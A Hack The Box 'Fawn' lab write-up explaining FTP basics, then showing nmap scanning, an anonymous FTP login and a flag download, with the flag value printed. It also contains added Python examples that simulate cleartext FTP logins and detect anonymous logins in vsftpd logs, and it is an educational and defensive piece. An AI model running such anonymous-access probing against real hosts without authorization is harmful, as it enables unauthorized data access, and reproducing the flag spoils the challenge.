Fawn HTB Writeup
October 5, 2024, 1:14 am

Overview

When assessing the services on specific hosts within a client network, we often encounter file transfer services that may be prone to poor configuration. This exercise aims to build familiarity with the File Transfer Protocol (FTP), a common and long-standing protocol for file transfers across various operating systems. Though widely used, FTP can be vulnerable when not properly configured. It’s not uncommon for employees within a client organization to attempt bypassing security measures when transferring files, which can lead to weaknesses.


FTP is also commonly used for transferring log files between network devices or to a log collection server. However, if a network engineer fails to secure the receiving FTP server, sensitive log data can be exposed, which an attacker could leverage for network mapping, identifying usernames, and detecting active services.


Understanding FTP

FTP operates on a client-server model, where a client (the user's machine) uploads or downloads files to/from a server (central storage). This model allows for clear roles within data transfer, where the server manages and stores files, while the client requests and transfers them. FTP requires credentials for access, but some servers allow anonymous logins, which poses security risks. For secure transmissions, FTP can be supplemented with SSL/TLS (FTPS) or replaced by the SSH File Transfer Protocol (SFTP).


Services on Ports

A port serves as a dedicated channel through which services run, allowing one IP address to manage multiple tasks. For example, a host can run FTP on port 21, SSH on port 22, and HTTPD for web services simultaneously. This setup enables a network administrator to manage configurations, access logs, and serve web content remotely, all at the same time.


Security Concerns

Without proper encryption via SSL/TLS or SSH tunnelling, FTP is vulnerable to Man-in-the-Middle (MitM) attacks, where the transferred data can be intercepted and viewed in plaintext. Tunnelling FTP through SSH (moving from port 21 to port 22) can effectively prevent this type of attack by encrypting the connection, ensuring that only the source and destination can decrypt the data.


Practical Example

In this case, we’ll examine a simple misconfigured FTP service on an internal host. By establishing a connection to the target and scanning for open services, we can identify FTP running on port 21. Using version detection switches can help determine if outdated or vulnerable software is in use, allowing us to make better decisions about our attack strategy.


Gaining Access

To interact with the FTP service, we use the ftp command on our machine. Once installed, this command allows us to connect to the target host. If the service is misconfigured to allow anonymous logins, we can use “anonymous” as the username and provide any password, gaining access to the server.


Once logged in, we can execute FTP commands like ls (list directory contents) and cd (change directory) to navigate the server. Using the get command, we can download specific files, such as a flag file, to our local machine.
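The two points above (an anonymous login is just a USER/PASS exchange on the control channel, and that exchange travels unencrypted) can be seen in one place with a small loopback simulation. This is an added example, not code from the writeup or from vsftpd: a throwaway control-channel server that only understands USER, PASS and QUIT talks to Python's standard ftplib client, and records the raw bytes the client sends so the cleartext credentials are visible. The anonymous_enable switch mirrors the vsftpd.conf option of the same name, which is the setting a defender turns off to close the issue shown in this box.

```python
"""Added example (not from the original writeup): a minimal FTP control-channel
server plus an ftplib client on loopback. It shows the 220/331/230 (or 530)
dialogue behind an anonymous login and that USER/PASS cross the wire in
cleartext. Everything here is constructed for illustration only."""
import socket
import threading
from ftplib import FTP, error_perm

# Usernames FTP servers conventionally treat as "anonymous".
ANON_USERS = {"anonymous", "ftp"}


class TinyFtpServer(threading.Thread):
    """Answers only the login part of the FTP dialogue and keeps the raw bytes
    it received, so the test can show what a network observer would see."""

    def __init__(self, anonymous_enable: bool):
        super().__init__(daemon=True)
        self.anonymous_enable = anonymous_enable   # same meaning as vsftpd's anonymous_enable
        self.wire = []                             # raw client->server bytes
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))           # ephemeral loopback port
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]

    def run(self):
        conn, _ = self.sock.accept()
        with conn, conn.makefile("rwb") as f:
            def send(line):
                f.write((line + "\r\n").encode())
                f.flush()

            send("220 (constructed-ftpd)")        # greeting, like "220 (vsFTPd 3.0.3)"
            user = None
            for raw in f:                          # one command per CRLF-terminated line
                self.wire.append(raw)
                verb, _, arg = raw.decode().rstrip("\r\n").partition(" ")
                verb = verb.upper()
                if verb == "USER":
                    user = arg
                    send("331 Please specify the password.")
                elif verb == "PASS":
                    # Any password is accepted for an anonymous user when enabled.
                    if user in ANON_USERS and self.anonymous_enable:
                        send("230 Login successful.")
                    else:
                        send("530 Login incorrect.")
                elif verb == "QUIT":
                    send("221 Goodbye.")
                    break
                else:
                    send("530 Please login with USER and PASS.")
        self.sock.close()


def try_anonymous_login(port, password="anonymous@"):
    """Attempt an anonymous login the way the ftp client in the writeup does.
    Returns (succeeded, last_reply)."""
    ftp = FTP()
    ftp.connect("127.0.0.1", port, timeout=5)
    try:
        return True, ftp.login("anonymous", password)
    except error_perm as e:                        # 530 from the server
        return False, str(e)
    finally:
        try:
            ftp.quit()
        except Exception:
            ftp.close()


def run_demo(anonymous_enable):
    """Start a server with the given policy, log in once, and return
    (succeeded, reply, cleartext_wire_capture)."""
    srv = TinyFtpServer(anonymous_enable)
    srv.start()
    ok, reply = try_anonymous_login(srv.port)
    srv.join(timeout=5)
    return ok, reply, b"".join(srv.wire).decode()


if __name__ == "__main__":
    for enabled in (True, False):
        ok, reply, wire = run_demo(enabled)
        print(f"anonymous_enable={enabled}: login ok={ok}, reply={reply!r}")
        print("  bytes seen on the wire:", wire.splitlines())
```

With anonymous_enable=True the capture contains the literal lines USER anonymous and PASS anonymous@, which is exactly what a MitM on the path would read; with it set to False the same client gets a 530 at the PASS step. The same check against a real host is what the ftp session in the writeup performs by hand.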


The Whole Process:

┌──(morb㉿AllYourBase)-[~]
└─$ ping 10.129.1.14
PING 10.129.1.14 (10.129.1.14) 56(84) bytes of data.
64 bytes from 10.129.1.14: icmp_seq=1 ttl=62 time=58.8 ms
64 bytes from 10.129.1.14: icmp_seq=2 ttl=62 time=64.8 ms
64 bytes from 10.129.1.14: icmp_seq=3 ttl=62 time=83.6 ms
^C
--- 10.129.1.14 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 58.799/69.038/83.566/10.555 ms
┌──(morb㉿AllYourBase)-[~]
└─$ sudo nmap -sV 10.129.1.14
[sudo] password for morb:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 03:12 CEST
Nmap scan report for 10.129.1.14
Host is up (0.083s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds


┌──(morb㉿AllYourBase)-[~]
└─$ ftp 10.129.1.14
Connected to 10.129.1.14.
220 (vsFTPd 3.0.3)
Name (10.129.1.14:morb): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||19839|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||10329|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |***************************************************************************|    32      664.89 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.17 KiB/s)
ftp> bye
221 Goodbye.
┌──(morb㉿AllYourBase)-[~]
└─$ ls
flag.txt  rce-ploit.sh  reports
┌──(morb㉿AllYourBase)-[~]
└─$ cat file.txt
cat: file.txt: No such file or directory
┌──(morb㉿AllYourBase)-[~]
└─$ ls
flag.txt  rce-ploit.sh  reports
┌──(morb㉿AllYourBase)-[~]
└─$ cd
┌──(morb㉿AllYourBase)-[~]
└─$ dir
flag.txt  rce-ploit.sh  reports
┌──(morb㉿AllYourBase)-[~]
└─$ cat flag.txt
035db21c881520061c53e0536e44f815
┌──(morb㉿AllYourBase)-[~]
└─$ ping 10.129.1.14
PING 10.129.1.14 (10.129.1.14) 56(84) bytes of data.
64 bytes from 10.129.1.14: icmp_seq=1 ttl=62 time=94.8 ms
64 bytes from 10.129.1.14: icmp_seq=2 ttl=62 time=107 ms
64 bytes from 10.129.1.14: icmp_seq=3 ttl=62 time=134 ms
^C
--- 10.129.1.14 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 94.810/111.989/133.920/16.316 ms
┌──(morb㉿AllYourBase)-[~]
└─$ sudo nmap -sV 10.129.1.14
[sudo] password for morb:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 03:11 CEST
Nmap scan report for 10.129.1.14
Host is up (0.11s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.28 seconds
┌──(morb㉿AllYourBase)-[~]
└─$ ftp 10.129.1.14
Connected to 10.129.1.14.
220 (vsFTPd 3.0.3)
Name (10.129.1.14:morb): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||32174|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||8751|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |***************************************************************************|    32        0.28 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.08 KiB/s)
ftp> bye
221 Goodbye.
┌──(morb㉿AllYourBase)-[~]
└─$ ls
flag.txt  rce-ploit.sh  reports
┌──(morb㉿AllYourBase)-[~]
└─$ cat flag.txt
035db21c881520061c53e0536e44f815
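From the server side, the session above leaves a recognisable trace: an anonymous login followed by a file download from the same client. The following is an added detection example, not part of the writeup; it parses vsftpd-style log lines and flags anonymous logins and any transfers those clients then make. The sample lines are constructed to mirror the session in this box (the client address 10.10.14.5, the user alice and the path /reports/q3.pdf are invented), and the line layout follows vsftpd's own log file format as I know it, which should be treated as an assumption and checked against a real vsftpd.log before use.

```python
"""Added example (not from the original writeup): flag anonymous FTP logins and
the files they download from vsftpd-style log lines. Sample lines are
constructed; the format is assumed to match vsftpd_log_file output."""
import re

# Constructed sample, modelled on the session in the writeup plus one normal user.
SAMPLE_LOG = """\
Sat Oct  5 03:11:40 2024 [pid 2] CONNECT: Client "10.10.14.5"
Sat Oct  5 03:11:44 2024 [pid 1] [ftp] OK LOGIN: Client "10.10.14.5", anon password "?"
Sat Oct  5 03:11:49 2024 [pid 3] [ftp] OK DOWNLOAD: Client "10.10.14.5", "/flag.txt", 32 bytes, 0.08Kbyte/sec
Sat Oct  5 03:14:02 2024 [pid 2] CONNECT: Client "10.10.14.7"
Sat Oct  5 03:14:05 2024 [pid 1] [alice] FAIL LOGIN: Client "10.10.14.7"
Sat Oct  5 03:14:11 2024 [pid 1] [alice] OK LOGIN: Client "10.10.14.7"
Sat Oct  5 03:14:20 2024 [pid 3] [alice] OK DOWNLOAD: Client "10.10.14.7", "/reports/q3.pdf", 40211 bytes, 512.00Kbyte/sec
"""

# Matches LOGIN/DOWNLOAD/UPLOAD/DELETE events; CONNECT lines carry no status and are skipped.
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ [\d:]+ \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>[^\]]+)\] )?'
    r'(?P<status>OK|FAIL) (?P<event>LOGIN|DOWNLOAD|UPLOAD|DELETE): '
    r'Client "(?P<client>[^"]+)"(?P<rest>.*)$'
)


def is_anonymous_login(user, rest):
    """vsftpd tags anonymous sessions with the local ftp user and, on a
    successful login, records the supplied 'anon password' (assumed format)."""
    return user == "ftp" or "anon password" in rest


def analyze(log_text):
    """Return a list of findings: one per anonymous login, plus one per
    transfer performed by a client that logged in anonymously."""
    anon_clients = set()
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        user, status, event = m["user"], m["status"], m["event"]
        client, rest, ts = m["client"], m["rest"], m["ts"]
        if status != "OK":
            continue                                  # failed attempts are not in scope here
        if event == "LOGIN" and is_anonymous_login(user, rest):
            anon_clients.add(client)
            findings.append({"type": "anonymous_login", "client": client, "ts": ts})
        elif event in ("DOWNLOAD", "UPLOAD") and client in anon_clients:
            path = re.search(r'"([^"]+)"', rest)      # first quoted field is the path
            findings.append({
                "type": "anonymous_" + event.lower(),
                "client": client,
                "path": path.group(1) if path else None,
                "ts": ts,
            })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f)
```

On the sample the two findings are the anonymous login from 10.10.14.5 and its download of /flag.txt; alice's authenticated download is left alone. In practice the anonymous_login finding alone is the signal that anonymous_enable is still on for that host.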


Conclusion

By successfully navigating and interacting with the FTP service, we can download the target file and complete the challenge. The key to exploiting FTP vulnerabilities lies in understanding the potential misconfigurations and how to leverage basic tools and commands to access critical data.